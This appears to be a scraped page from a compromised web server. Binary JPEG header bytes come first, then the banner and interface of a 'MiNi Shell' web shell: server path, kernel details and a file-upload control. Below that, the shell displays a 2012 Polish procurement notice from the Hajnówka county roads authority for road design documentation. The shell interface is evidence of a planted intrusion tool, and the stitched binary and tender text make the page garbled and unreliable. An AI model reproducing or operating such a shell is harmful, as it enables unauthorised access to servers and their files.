JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/58826-N-2012.html

<p class="kh_header"><b>Hajnówka: Opracowanie dokumentacji projektowo-kosztorysowych</b><br>
<b>Numer ogłoszenia: 58826 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Hajnówce , ul. Bielska 41, 17-200 Hajnówka, woj. podlaskie, tel. 085 683-20-01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo-kosztorysowej przebudowy i rozbudowy dróg powiatowych wraz z uzyskaniem nieprawomocnej decyzji o pozwoleniu na budowę, lub zgłoszenia budowy nie wymagającego pozwolenia na budowę, lub zezwolenia na realizację inwestycji drogowej dla niżej wymienionych zadań: 
Zadanie 1- Opracowanie dokumentacji na wykonanie przebudowy drogi powiatowej 
Nr 1652 B Wólka Terechowska - Opaka Duża.                  
Dane do projektowania:
- długość drogi - ok. 11, 5 km Zakres opracowania: od granicy z Gminą Kleszczele- Opaka Duża - do  istniejącej nawierzchni bitumicznej we wsi Wólka Terechowska.
- klasa techniczna drogi - L,
Zakres przebudowy obejmuje:
- przebudowę-rozbudowę drogi- rodzaj projektowanej nawierzchni - potrójne powierzchniowe utrwalenie,
- budowę nowych i przebudowę istniejących przepustów - o ile zajdzie konieczność,
- przebudowę istniejących zjazdów - o ile zajdzie konieczność,   ,
- odmulenie i oczyszczenie rowów przydrożnych - o ile zajdzie konieczność,  
- przebudowę istniejących linii energetycznych - o ile zajdzie konieczność,
- przebudowę istniejących linii telekomunikacyjnych- o ile zajdzie konieczność,
- budowę kanałów technologicznych- o ile zajdzie konieczność,
- przebudowę istniejących sieci wodociągowych i kanalizacyjnych - o ile zajdzie konieczność,
- opracowanie i uzgodnienie  projektu stałej organizacji ruchu,
- inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami geod. działek  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki i danymi adresowymi właścicieli działek, sporządzenie wykazu drzew -wg numeracji naniesionej na mapie, z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach.
- inne, które mogą wyniknąć w trakcie projektowania
- uzyskanie nieprawomocnej decyzji pozwolenia na budowę/zgłoszenia lub ZRID
- wykonanie pomiarów geodezyjnych i inwentaryzacji o ile takowe będą konieczne,
- przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach, zgody na realizację przedsięwzięcia, decyzji o ustaleniu lokalizacji inwestycji celu publicznego, raportu o oddziaływaniu ma środowisko, uzyskanie pozwolenia wodno - prawnego i uzyskanie tych decyzji o ile takowe będą konieczne,
- opracowanie innych uznanych za niezbędne przez Wykonawcę, bądź stosowne instytucje i urzędy, opracowań badań analiz.
- pełnienie nadzoru autorskiego
  Zamawiający udostępnia podkład geodezyjny do celów projektowych w wersji papierowej i elektronicznej.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji
Zadanie 2 - Opracowanie dokumentacji na wykonanie przebudowy drogi powiatowej
Nr 1654 B i 1675 B w miejscowości Dubicze Cerkiewne tj. ul. Głównej,Parkowej i Leśnej.
Dane do projektowania:
- łączna długość ulic Głównej, Parkowej i Leśnej wynosi- ok. 2,53 km 
- klasy techniczne drogi -ulic - Z,L,
Zakres przebudowy obejmuje:
- przebudowę-rozbudowę ulic wraz z chodnikami i zjazdami. rodzaj projektowanej nawierzchni - nawierzchnia z betonu asfaltowego.
- budowę nowych i przebudowę istniejących przepustów, kanalizacji deszczowej,  rowów odwadniających  - o ile zajdzie konieczność,
- przebudowę istniejących linii energetycznych i oświetleniowych- o ile zajdzie konieczność,
- przebudowę istniejących linii telekomunikacyjnych- o ile zajdzie konieczność,
- budowę kanałów technologicznych- o ile zajdzie konieczność,
- przebudowę istniejących sieci wodociągowych i kanalizacyjnych - o ile zajdzie konieczność,
- rodzaj projektowanej nawierzchni - nawierzchnia z betonu asfaltowego.
- opracowanie i uzgodnienie projektu stałej organizacji ruchu,
- inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami inw.  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki z danymi adresowymi właścicieli działek, sporządzenie wykazu drzew -wg numeracji naniesionej na mapie, z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach.
- inne, które mogą wyniknąć w trakcie projektowania.
- uzyskanie nieprawomocnej decyzji pozwolenia na budowę,zgłoszenia lub ZRID
 - wykonanie pomiarów geodezyjnych i inwentaryzacji o ile takowe będą konieczne,
- przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach, zgody na realizację przedsięwzięcia, decyzji o ustaleniu lokalizacji inwestycji celu publicznego, raportu o oddziaływaniu ma środowisko, uzyskanie pozwolenia wodno - prawnego i uzyskanie tych decyzji o ile takowe będą konieczne,
- opracowanie innych uznanych za niezbędne przez Wykonawcę, bądź stosowne instytucje i urzędy, opracowań badań analiz.
- pełnienie nadzoru autorskiego.
Wykonawca zabezpiecza wszystkie materiały tj. między innymi  mapy, podkłady geodezyjne i inne.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji.
Zadanie 3 - Opracowanie dokumentacji na wykonanie przebudowy drogi powiatowej Nr 1747 B  ul. Boćkowska w Kleszczelach.
Dane do projektowania:
- długość ulic Boćkowskiej wynosi- ok. 0,7 km. Zakres od skrzyżowania z ul. Mickiewicza , do końca obszaru zabudowanego,
- klasy techniczne drogi -ulic - Z,L,
Zakres przebudowy obejmuje:
- przebudowę-rozbudowę ulicy wraz z chodnikami i zjazdami, rodzaj projektowanej nawierzchni - nawierzchnia z betonu asfaltowego.
- budowę nowych i przebudowę istniejących przepustów, kanalizacji deszczowej,  rowów odwadniających  - o ile zajdzie konieczność,
- przebudowę istniejących linii energetycznych i oświetleniowych- o ile zajdzie konieczność,
- przebudowę istniejących linii telekomunikacyjnych- o ile zajdzie konieczność,
- budowę kanałów technologicznych- o ile zajdzie konieczność,
- przebudowę istniejących sieci wodociągowych i kanalizacyjnych - o ile zajdzie konieczność,
- opracowanie projektu stałej organizacji ruchu,
- inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami inw.  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki z danymi adresowymi właścicieli działek, sporządzenie wykazu drzew -wg numeracji naniesionej na mapie, z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach.
- inne, które mogą wyniknąć w trakcie projektowania.
- uzyskanie nieprawomocnej decyzji pozwolenia na budowę,zgłoszenia lub ZRID
- wykonanie pomiarów geodezyjnych i inwentaryzacji o ile takowe będą konieczne,
- przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach, zgody na realizację przedsięwzięcia, decyzji o ustaleniu lokalizacji inwestycji celu publicznego, raportu o oddziaływaniu ma środowisko, uzyskanie pozwolenia wodno - prawnego i uzyskanie tych decyzji o ile takowe będą konieczne,
- opracowanie innych uznanych za niezbędne przez Wykonawcę, bądź stosowne instytucje i urzędy, opracowań badań analiz.
- pełnienie nadzoru autorskiego.
Wykonawca zabezpiecza wszystkie materiały tj. między innymi  mapy, podkłady geodezyjne i inne.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji. Wykonawca zobowiązany będzie do bieżącego uzgadniania zakresu prac projektowych i proponowanych rozwiązań oraz uzyskania akceptacji Zamawiającego. Wykonawca dostarczy z odpowiednim wyprzedzeniem przedmiot zamówienia do siedziby Zamawiającego. Zamawiający zastrzega sobie 7 dniowy termin -7 dni roboczych na dokonanie sprawdzenia, oceny poprawności i zgodności  złożonego opracowania w wymaganiami SIWZ i umowy. Po dokonaniu sprawdzenia dostarczonej dokumentacji i nie wniesienie uwag przez Zamawiającego, Wykonawca sporządzi protokół zdawczo - odbiorczy i wystąpi do właściwego organu z wnioskiem o wydanie pozwolenia na budowę lub złoży zgłoszenie budowy, wykonania robót budowlanych lub o uzyskanie decyzji ZRID.
1. Rzeczowy zakres dokumentacji obejmuje niżej wymienione ilości opracowań:
1.1 projekty budowlane (przebudowa ulic lub drogi, kanalizacji deszczowej lub odwodnienia powierzchniowego, przebudowę  lub budowę przepustów , projekty branżowe:
- energetyka, telekomunikacja, sieć wodociągowa i kanalizacyjna, kanały technologiczne, przepusty drogowe i inne,  o ile takowe będą konieczne) - w liczbie 5 egzemplarzy + wersja elektroniczna na CD, DVD w PDF i  Word,
1.2 projekty wykonawcze - opracowania jak dla projektów budowlanych - w liczbie po 4 egzemplarze na każdą ulicę + wersja elektroniczna na CD, DVD w PDF i Word,
1.3 przedmiary robót, przez które należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych  -dla wszystkich branż- w liczbie po 4 egzemplarze na każdą ulicę lub drogę + wersja elektroniczna na CD, DVD -w formacie Excel , Word,
1.4 kosztorysy inwestorskie - w liczbie po 2 egzemplarze na każdą ulicę + wersja elektroniczna na CD, DVD -w formacie Excel, Word,
1.5 kosztorysy ofertowe - w liczbie po 2 egzemplarze na każdą ulicę + wersja elektroniczna na CD, DVD w formacie Excel, Word,
1.6 specyfikacja techniczna wykonania i odbioru robót -STWiOR, przez które należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót - w liczbie 3 egzemplarzy + wersja elektroniczna na CD, DVD w PDF i Word.
1.7 projekty stałej organizacji ruchu - w liczbie 4 egzemplarzy + wersja elektroniczna na CD, DVD w PDF i Word,
1.8 projekty zagospodarowania zieleni -wycinki i nasadzeń drzew, wraz z uzyskaniem
pozwolenia na wycinkę , o ile takowe będą konieczne - w liczbie 2 egzemplarzy + wersja elektroniczna na CD, DVD w PDF i Word.
1.9 operat wodno-prawny + pozwolenie wodno-prawne -o ile takowe będą konieczne, w liczbie 2 egzemplarzy + CD w PDF i Word,
1.10 raporty o oddziaływaniu na środowisko, o ile takowe będą konieczne - w liczbie 2 egzemplarzy + wersja elektroniczna na CD, DVD w PDF i Word.
2. projekty badań geotechnicznych gruntu- w liczbie 2 egzemplarzy,
Liczba egzemplarzy podana określa ilość poszczególnych opracowań, które Wykonawca przekaże bezpośrednio Zamawiającemu.  Nie uwzględnia ona egzemplarzy niezbędnych do uzyskania wymaganych uzgodnień.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji. 
3.  inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami inw.  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki z danymi adresowymi właścicieli działek, sporządzenie wykazu drzew -wg numeracji naniesionej na mapie, z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach - w liczbie 3 egz,. Liczba egzemplarzy podana określa ilość poszczególnych opracowań, które Wykonawca przekaże bezpośrednio Zamawiającemu.  Nie uwzględnia ona egzemplarzy niezbędnych do uzyskania wymaganych uzgodnień.
4. Opis szczegółowych elementów, które należy uwzględnić w kosztach opracowywanych dokumentacji - dla zadania 1, zadania 2 i zadania 3. 
5. Wykonawca własnym staraniem i na własny koszt uzyska wszelkie wymagane, zgodnie z polskim prawem, uzgodnienia, opinie i decyzje administracyjne niezbędne do opracowania kompletnej dokumentacji projektowo - kosztorysowej, a w szczególności:
-  podkłady geodezyjne do celów projektowych w skali 1:500- dla zadania Nr 2. i Nr 3 podkład geodezyjny dla zadania Nr 1 udostępni Zamawiający
-przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia i uzyskanie tej decyzji;
- przygotowanie materiałów niezbędnych do uzyskania decyzji o lokalizacji inwestycji celu publicznego i uzyskanie tej decyzji;
- opracowanie raportu o oddziaływaniu na środowisko, o ile takowy będzie konieczny;
-opracowanie operatu wodno-prawnego oraz uzyskanie pozwolenia wodno-prawnego, o ile takowy będzie konieczny;
- wykonaniem wszelkich niezbędnych do tego celu badań, opracowań i analiz, wykonanie pomiarów geodezyjnych i inwentaryzacji;
- wykonanie badań geotechnicznych gruntu;
-opracowanie innych, uznanych za konieczne przez Wykonawcę bądź stosowne instytucje i urzędy, opracowań, badań i analiz,
- opracowanie kompletnej dokumentacji projektowo - kosztorysowej wraz z projektami branżowymi;
- uzyskanie decyzji na lokalizację i umieszczenie urządzenia obcego w pasie drogowym, o ile takowe będą konieczne;
- uzyskanie wszelkich uzgodnień, opinii, analiz i materiałów niezbędnych do uzyskania pozwolenia na budowę, lub zgłoszenia budowy nie wymagającego pozwolenia na budowę, lub zezwolenia na realizację inwestycji drogowej;
-uzyskanie pozwolenia na budowę lub zgłoszenia budowy nie wymagającego pozwolenia na budowę, lub zezwolenia na realizację inwestycji drogowej;
- w terminie najpóźniej do 3 miesięcy od dnia podpisania umowy wykonawca przedstawi koncepcję podziału nieruchomości, jeżeli takowe będą konieczne. Podział nieruchomości dokona na koszt własny.
-w cenie wykonanej dokumentacji projektowo-kosztorysowej należy uwzględnić koszty wykonania dokumentacji kanałów technologicznych o ile takowa będzie konieczny;
6. Wszelkie koszty związane z uzyskaniem wyszczególnionych w pkt. 3.1 opinii i uzgodnień, wykonaniem badań, pomiarów i opracowań niezbędnych do wykonania kompletnej dokumentacji technicznej muszą być uwzględnione w cenie ofertowej.
7. Przed przystąpieniem do projektowania, Wykonawca w terminie nie później niż 3 miesiące opracuje koncepcję proponowanych rozwiązań i przedłoży ją do akceptacji Zamawiającego, jak również uzyska akceptację jednostek opiniujących.
8. Wykonawca zobowiązany jest do bieżącego uzgadniania prac projektowych i uzyskiwania akceptacji Zamawiającego oraz do przedłożenia Zamawiającemu opracowanej dokumentacji projektowej do zatwierdzenia przed złożeniem wniosku o wydanie pozwolenia na budowę,zgłoszenia lub ZRID w terminie umożliwiającym wprowadzenie ewentualnych zmian do projektu.
9. Nieodpłatnego i niezwłocznego udzielania wyjaśnień na ewentualne zapytania oferentów, jakie zostaną złożone w toku przetargu na realizację robót na podstawie wykonanej przez niego dokumentacji projektowej, a także wyjaśnień w przypadku złożenia protestu.
10. Pełnienia nadzoru autorskiego w okresie realizacji robót budowlanych zgodnie z art.20 ust.1 pkt 4 ustawy Prawo budowlane. Koszt nadzoru muszą być uwzględnione w cenie ofertowej. Pobyt na budowie w zależności od potrzeb, na każde wezwanie zamawiającego.
11.Wykonawca przejmie na siebie wyłączną odpowiedzialność za wszelkie roszczenia z tytułu praw autorskich związanych z wykonywaną dokumentacją projektową oraz pokrywa wszelkie koszty wynikające z popełnionych błędów.
12.  W celu prawidłowego opracowania oferty Wykonawca winien sprawdzić w terenie warunki
wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje.
13. Zamawiający wymaga udzielenia przez wykonawcę na wykonaną usługę gwarancji jakości na okres 36 miesięcy. W okresie gwarancji wykonawca zobowiązuje się do nieodpłatnej  aktualizacji opracowanych przez siebie dokumentacji, o ile zajdzie taka konieczność oraz aktualizacji kosztorysów inwestorskich- max 2 razy.
14. Dokumentacja projektowo - kosztorysowa zostanie opracowana zgodnie z aktualnymi przepisami prawa, m.in.:
- Ustawa z dnia 7 lipca 1994 roku Prawo budowlane -tekst jednolity - Dz. U. z 2010 r. Nr 243, poz. 1623,
- Ustawą o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych -Dz. U. z 2003, Nr 80, poz. 721 ze zmianami,
- Ustawą z dnia 29 stycznia 2004 roku Prawo zamówień publicznych ( tj. Dz. U Nr z 2010 roku , Nr 113 poz. 759 z póź, zm),
- Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 rok w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie -Dz. U. z 1999 r. nr 43 poz. 430,
- Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego -Dz. U. z 2003 r., Nr 120, poz. 1133 ze zmianami,
- Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego -Dz. U. Nr. 202, poz. 2072 ze zmianami,
- Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod ipodstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów pracprojektowych oraz planowanych kosztów robót budowlanych określonych w programiefunkcjonalno - użytkowym -Dz. U. Nr 130, poz. 1389,
- Rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003 roku w sprawie szczegółowych warunków technicznych dla znaków drogowych orza urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach -Dz. U  Nr 220, poz 2181 z póż, zm, 
- uwzględniać będzie zapisy zamieszczone w przywołanych rozporządzeniach i ustawach. 
- Zamawiający zastrzega sobie prawo 7 dni roboczych na dokonanie uzgodnień, sprawdzeń, ocen poprawności i zgodności proponowanych rozwiązań  w celu uzyskania akceptacji oraz opracowanej dokumentacji zgodnej z wymaganiami SIWZ i umowy.
- na opracowany przedmiot umowy zostanie sporządzony protokół zdawczo - odbiorczy, po podpisaniu którego Wykonawca wystąpi do właściwego organu z wnioskiem o uzyskanie decyzji pozwolenia na budowę, zgłoszenie lub uzyskanie decyzji ZRID.
15.Projektanci wykonujący dokumentacje projektowa muszą przestrzegać zapisów zawartych w art.29 ust. 3 ustawy Pzp, który określa, że przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfika przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzysza wyrazy lub równoważny. W przypadku opisania przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia i użyciu wyrażenia lub równoważny, należy podać minimalne parametry techniczne do których będą odnosić się wykonawcy wykazujący równoważność zaoferowanych rozwiązań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedłoży oświadczenie zgodnie z załącznikiem Nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek, jeżeli wykonawca wykaże, że wykonał, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na wykonaniu dokumentacji technicznej podobnej co do zakresu i charakteru na kwotę nie niższą niż 40 000 zł brutto oraz załączy dokumenty potwierdzające, że usługa ta została wykonana należycie.-oświadczenie załącznik Nr 8 wraz z referencjami</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez przedłożenie przez Wykonawcę oświadczenia zgodnie z załącznikiem Nr 2 i 6</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez przedłożenie przez Wykonawcę oświadczenia zgodnie z załącznikiem Nr 2 i 6</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez przedłożenie przez Wykonawcę oświadczenia zgodnie z załącznikiem Nr 2</p>
</li></ul></li></ul>
